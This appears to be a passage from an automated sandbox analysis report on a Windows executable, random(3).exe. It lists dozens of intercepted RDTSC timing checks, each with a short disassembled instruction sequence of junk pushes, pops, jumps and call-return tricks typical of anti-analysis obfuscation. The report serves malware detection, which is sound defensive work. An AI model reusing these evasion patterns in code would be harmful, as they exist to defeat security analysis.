    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 150A221 second address: 150A225 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 150A697 second address: 150A69B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 150A73D second address: 150A743 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 150AB43 second address: 150AB47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 150AB47 second address: 150AB59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518E9Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 150B61D second address: 150B648 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC4F36A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F29FC4F36A2h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 150B435 second address: 150B43D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 150C6CC second address: 150C736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F29FC4F3698h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push edi 0x00000027 call 00007F29FC4F3698h 0x0000002c pop edi 0x0000002d mov dword ptr [esp+04h], edi 0x00000031 add dword ptr [esp+04h], 00000014h 0x00000039 inc edi 0x0000003a push edi 0x0000003b ret 0x0000003c pop edi 0x0000003d ret 0x0000003e mov edi, eax 0x00000040 push 00000000h 0x00000042 sbb si, 7D0Bh 0x00000047 push eax 0x00000048 pushad 0x00000049 jmp 00007F29FC4F36A9h 0x0000004e pushad 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 150C736 second address: 150C73C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 150E079 second address: 150E07F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 150EF07 second address: 150EF0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 150EF0B second address: 150EF15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1510632 second address: 151063C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F29FC518E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 150EF15 second address: 150EF19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 151063C second address: 151064F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29FC518E9Fh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1514840 second address: 151485F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC4F369Bh 0x00000007 jmp 00007F29FC4F369Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 151485F second address: 151487B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007F29FC518EA0h 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14C277F second address: 14C2785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15171B8 second address: 15171D5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jg 00007F29FC518E96h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F29FC518E9Eh 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 151AA72 second address: 151AA76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15171D5 second address: 15171EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29FC518EA3h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 151AA76 second address: 151AA7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 151AA7C second address: 151AA93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29FC518EA3h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 151AA93 second address: 151AAA6 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F29FC4F3696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 push edx 0x00000011 pop edx 0x00000012 pop ecx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 151DA46 second address: 151DA4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 151CC86 second address: 151CCA9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F29FC4F36A3h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007F29FC4F3696h 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 151DA4C second address: 151DAD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F29FC518E98h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 0000001Ch 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 xor di, 8587h 0x00000028 mov edi, dword ptr [ebp+1244EF5Dh] 0x0000002e push 00000000h 0x00000030 add edi, dword ptr [ebp+122D293Bh] 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push edi 0x0000003b call 00007F29FC518E98h 0x00000040 pop edi 0x00000041 mov dword ptr [esp+04h], edi 0x00000045 add dword ptr [esp+04h], 0000001Ch 0x0000004d inc edi 0x0000004e push edi 0x0000004f ret 0x00000050 pop edi 0x00000051 ret 0x00000052 mov ebx, dword ptr [ebp+122D37A1h] 0x00000058 mov dword ptr [ebp+122D1B8Fh], esi 0x0000005e mov ebx, dword ptr [ebp+122D1BC5h] 0x00000064 push eax 0x00000065 push eax 0x00000066 push edx 0x00000067 jmp 00007F29FC518EA0h 0x0000006c rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 151CCA9 second address: 151CCC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC4F36A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F29FC4F369Ah 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 151DAD7 second address: 151DAE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29FC518E9Eh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 151E987 second address: 151EA28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29FC4F36A0h 0x00000009 popad 0x0000000a je 00007F29FC4F369Ch 0x00000010 jg 00007F29FC4F3696h 0x00000016 popad 0x00000017 push eax 0x00000018 push esi 0x00000019 jnc 00007F29FC4F369Ch 0x0000001f pop esi 0x00000020 nop 0x00000021 push 00000000h 0x00000023 push edi 0x00000024 call 00007F29FC4F3698h 0x00000029 pop edi 0x0000002a mov dword ptr [esp+04h], edi 0x0000002e add dword ptr [esp+04h], 0000001Dh 0x00000036 inc edi 0x00000037 push edi 0x00000038 ret 0x00000039 pop edi 0x0000003a ret 0x0000003b jmp 00007F29FC4F36A5h 0x00000040 push 00000000h 0x00000042 mov ebx, edi 0x00000044 push 00000000h 0x00000046 push 00000000h 0x00000048 push esi 0x00000049 call 00007F29FC4F3698h 0x0000004e pop esi 0x0000004f mov dword ptr [esp+04h], esi 0x00000053 add dword ptr [esp+04h], 00000016h 0x0000005b inc esi 0x0000005c push esi 0x0000005d ret 0x0000005e pop esi 0x0000005f ret 0x00000060 mov ebx, dword ptr [ebp+122D294Dh] 0x00000066 xchg eax, esi 0x00000067 jc 00007F29FC4F36A4h 0x0000006d push eax 0x0000006e push edx 0x0000006f push eax 0x00000070 push edx 0x00000071 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 151EA28 second address: 151EA2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1521E0F second address: 1521E16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1522DA1 second address: 1522DA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1522DA5 second address: 1522DA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1523F29 second address: 1523F2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1522F35 second address: 1522F39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1523F2E second address: 1523F38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F29FC518E96h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1520EAE second address: 1520ECB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F29FC4F36A8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1522F39 second address: 1522F4F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F29FC518E98h 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1523F38 second address: 1523FA9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F29FC4F3696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov dword ptr [ebp+122D1F8Ch], edx 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007F29FC4F3698h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 00000018h 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 mov bx, 6B9Eh 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push edx 0x0000003a call 00007F29FC4F3698h 0x0000003f pop edx 0x00000040 mov dword ptr [esp+04h], edx 0x00000044 add dword ptr [esp+04h], 0000001Ah 0x0000004c inc edx 0x0000004d push edx 0x0000004e ret 0x0000004f pop edx 0x00000050 ret 0x00000051 xchg eax, esi 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F29FC4F369Fh 0x00000059 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1522F4F second address: 1522FE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518E9Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push ecx 0x0000000b mov di, 2121h 0x0000000f pop edi 0x00000010 push edx 0x00000011 pop ebx 0x00000012 push dword ptr fs:[00000000h] 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007F29FC518E98h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 0000001Ch 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 mov dword ptr fs:[00000000h], esp 0x0000003a xor di, 1B61h 0x0000003f mov eax, dword ptr [ebp+122D1175h] 0x00000045 push FFFFFFFFh 0x00000047 push 00000000h 0x00000049 push ecx 0x0000004a call 00007F29FC518E98h 0x0000004f pop ecx 0x00000050 mov dword ptr [esp+04h], ecx 0x00000054 add dword ptr [esp+04h], 00000018h 0x0000005c inc ecx 0x0000005d push ecx 0x0000005e ret 0x0000005f pop ecx 0x00000060 ret 0x00000061 nop 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 jmp 00007F29FC518EA8h 0x0000006a push ebx 0x0000006b pop ebx 0x0000006c popad 0x0000006d rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1522FE8 second address: 1523004 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F29FC4F36A7h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1523004 second address: 1523010 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1524F94 second address: 1524FB5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F29FC4F36A4h 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 152413B second address: 15241BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F29FC518E96h 0x00000009 jnp 00007F29FC518E96h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007F29FC518E98h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d mov ebx, dword ptr [ebp+122D28D1h] 0x00000033 push dword ptr fs:[00000000h] 0x0000003a or dword ptr [ebp+12459A4Eh], edx 0x00000040 mov dword ptr fs:[00000000h], esp 0x00000047 je 00007F29FC518E9Ch 0x0000004d mov edi, dword ptr [ebp+122D2303h] 0x00000053 mov eax, dword ptr [ebp+122D168Dh] 0x00000059 jmp 00007F29FC518E9Eh 0x0000005e push FFFFFFFFh 0x00000060 sub ebx, 3E56853Ah 0x00000066 nop 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a jp 00007F29FC518E96h 0x00000070 pop eax 0x00000071 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1524FB5 second address: 1525029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 nop 0x00000007 mov dword ptr [ebp+122D288Fh], eax 0x0000000d mov bx, ax 0x00000010 push 00000000h 0x00000012 add ebx, dword ptr [ebp+122D30EBh] 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebx 0x0000001d call 00007F29FC4F3698h 0x00000022 pop ebx 0x00000023 mov dword ptr [esp+04h], ebx 0x00000027 add dword ptr [esp+04h], 00000014h 0x0000002f inc ebx 0x00000030 push ebx 0x00000031 ret 0x00000032 pop ebx 0x00000033 ret 0x00000034 mov dword ptr [ebp+1244EDF9h], esi 0x0000003a xor edi, 160A5972h 0x00000040 xchg eax, esi 0x00000041 pushad 0x00000042 jns 00007F29FC4F369Ch 0x00000048 push edi 0x00000049 js 00007F29FC4F3696h 0x0000004f pop edi 0x00000050 popad 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F29FC4F36A8h 0x00000059 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15241BB second address: 15241DA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jp 00007F29FC518E96h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F29FC518EA0h 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1525F55 second address: 1525FA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 mov dword ptr [esp], eax 0x0000000b mov di, 56E2h 0x0000000f push 00000000h 0x00000011 mov bx, 6E00h 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007F29FC4F3698h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 00000019h 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 pushad 0x00000032 push eax 0x00000033 add dword ptr [ebp+122D35CCh], eax 0x00000039 pop eax 0x0000003a mov dword ptr [ebp+122D2106h], ecx 0x00000040 popad 0x00000041 push eax 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 jc 00007F29FC4F3696h 0x0000004b rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 152617F second address: 1526196 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29FC518EA2h 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15270C6 second address: 1527155 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC4F36A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007F29FC4F3698h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 xor dword ptr [ebp+122D22E6h], edi 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ebp 0x00000031 call 00007F29FC4F3698h 0x00000036 pop ebp 0x00000037 mov dword ptr [esp+04h], ebp 0x0000003b add dword ptr [esp+04h], 00000015h 0x00000043 inc ebp 0x00000044 push ebp 0x00000045 ret 0x00000046 pop ebp 0x00000047 ret 0x00000048 movzx edi, dx 0x0000004b push 00000000h 0x0000004d mov dword ptr [ebp+1244ED10h], esi 0x00000053 xchg eax, esi 0x00000054 push eax 0x00000055 push edx 0x00000056 jno 00007F29FC4F36ADh 0x0000005c rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1527155 second address: 1527168 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29FC518E9Fh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1526196 second address: 15261A9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jnl 00007F29FC4F36A4h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15261A9 second address: 15261AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1527168 second address: 1527179 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F29FC4F3696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ecx 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14C0D3C second address: 14C0D53 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F29FC518E96h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 pushad 0x00000015 popad 0x00000016 pop ebx 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 152EB5D second address: 152EB63 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 152EB63 second address: 152EB94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F29FC518EA2h 0x0000000c jmp 00007F29FC518E9Ch 0x00000011 pop ecx 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 jc 00007F29FC518E96h 0x0000001c pop edx 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 152EB94 second address: 152EB99 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1533E97 second address: 1533EA5 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F29FC518E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1533EA5 second address: 1533EA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 153B60E second address: 153B612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14BA230 second address: 14BA241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29FC4F369Dh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14BA241 second address: 14BA267 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F29FC518EA0h 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F29FC518E9Ah 0x00000015 popad 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 153A26D second address: 153A27F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F29FC4F369Ch 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 153A27F second address: 153A28B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F29FC518E96h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 153A28B second address: 153A28F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 153A8C2 second address: 153A8E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29FC518EA8h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 153ABDB second address: 153ABE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 153ABE3 second address: 153ABE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 153ABE9 second address: 153AC08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29FC4F36A6h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 153AED2 second address: 153AEFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518EA8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnl 00007F29FC518E98h 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
